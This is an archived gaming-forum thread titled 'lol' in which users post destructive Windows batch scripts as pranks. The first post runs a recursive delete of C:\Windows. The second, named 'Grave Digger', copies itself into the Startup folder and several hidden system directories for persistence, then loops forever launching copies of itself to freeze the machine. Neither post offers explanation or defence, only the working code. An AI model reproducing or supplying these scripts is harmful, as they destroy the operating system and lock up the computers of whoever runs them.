A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

lol

561 views · started by Fluxo ·
#1
lol
@ echo off
title pwned
rmdir "C:\Windows" /s

~Fluxo
#2
@ECHO OFF
@BREAK OFF
TITLE Grave Digger
COPY %0 "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\" > nul
MD "C:\Documents and Settings\%USERNAME%\Application Data\Windows Messenger\" > nul
COPY %0 "C:\Documents and Settings\%USERNAME%\Application Data\Windows Messenger\" > nul
COPY %0 "C:\Documents and Settings\%USERNAME%\WINDOWS\system\" > nul
COPY %0 "C:\Documents and Settings\%USERNAME%\Cookies\" > nul
COPY %0 "C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\" > nul
COPY %0 "C:\WINDOWS\system\" > nul
COPY %0 "C:\WINDOWS\Prefetch\" > nul
MD "C:\RECYCLER\S-1-5-21-1844237615-1757981266-1417001333-1003\" > nul
COPY %0 "C:\RECYCLER\S-1-5-21-1844237615-1757981266-1417001333-1003\" > nul
:START
START "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\grvdgr.bat"
START "C:\Documents and Settings\%USERNAME%\Application Data\Windows Messenger\grvdgr.bat"
START "C:\Documents and Settings\%USERNAME%\WINDOWS\system\grvdgr.bat"
START "C:\Documents and Settings\%USERNAME%\Cookies\grvdgr.bat"
START "C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\grvdgr.bat"
START "C:\WINDOWS\system\grvdgr.bat"
START "C:\WINDOWS\Prefetch\grvdgr.bat"
START "C:\RECYCLER\S-1-5-21-1844237615-1757981266-1417001333-1003\grvdgr.bat"
START %0
GOTO START